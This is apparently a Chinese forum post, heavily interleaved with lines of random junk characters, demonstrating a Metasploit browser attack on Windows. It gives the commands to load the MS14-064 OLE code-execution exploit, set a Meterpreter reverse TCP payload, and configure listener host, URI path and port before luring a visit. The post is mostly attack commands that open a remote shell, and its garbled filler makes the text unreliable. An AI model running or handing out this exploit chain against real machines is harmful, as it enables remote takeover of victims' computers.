$ L8 `: `, K: h9 f% `3 z/ r
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示% d2 b7 t2 e6 Q
3 \' @& h" \( K
c, c2 d9 T- W G3 o
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
- h( v8 Y/ \2 P+ P$ D- X
w# _7 B" W5 e5 t7 b8 L. d7 m; Y) I' g# `( q
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
2 |+ ^% x( n3 C0 L8 P% V; l
" p/ _. {% a' M8 A& J0 c; j4 G$ X0 l, a3 _; {) g( N
set AllowPowershellPrompt true
7 z" T6 W4 L: f' r4 d8 k2 S
; q; Z' \+ x$ ~( u6 w: h
, p7 `- ]( e: }9 K Set LHOST 192.168.0.109/ {; u6 @4 N6 J
8 ~& Q2 p2 E$ K7 {" h& q& f5 w. h' X$ ^0 o
set SRVHOST 192.168.0.109# Y" L B J5 w
8 ~4 j2 a: _" {$ U
: s4 A1 @* x! z1 Y( \, s2 f; N Set uripath share
! [( H# W+ ^8 G2 a. F- H
* d i' p* _. D' X A0 l6 n* M3 V; F$ V' \8 t
Set srvport 80
' I1 f+ \' g8 s7 Q' O
" w0 r: _2 e6 G, J9 H4 C
* K1 Y8 B2 ~3 W- ^3 c# O
/ E' }. W7 z) B) Q5 C2 {/ A
& P+ s3 s9 U$ |; k) x
8 a% R& N5 ]1 }% P' C " ~9 K) n4 p! J0 f O9 ~2 H2 Q# a
9 Y& F% _6 ~: U: H o' C( u
. w( P3 N- L7 y2 s $ B0 t- d8 d" z+ S$ B0 M
( X6 f- {: y; ?7 S/ E o' d
( A3 L# T4 t( x" t, x- J J, N
5 i, g! E4 \, O, p/ b
7 o- Y [3 g. @& T; ^& ^
& g; O0 G5 b2 [. J& k- N
' i5 w( c; }5 a4 l% v
9 C: y# [3 i4 Y/ n2 P3 z, F ^
* |) n# z# l& M+ B 下面我们来访问本地地址如图:
7 o( U! d, ^. ^: S/ Y" m
' \# {8 ?1 j8 s3 e+ C# h
; O/ \: W- u5 w4 d
$ w3 ?1 d! \/ o/ Z
& n! z0 j9 ]( q1 p c3 t1 u# ]5 y( Q7 v U2 `. b) ^5 X
]. \2 c3 O, F& I7 H8 F) V% A2 N/ a
) T2 b' ~. N+ x5 @5 K
- \0 s6 A) V9 A. R9 R6 ]
3 R/ |- {& R: L G+ L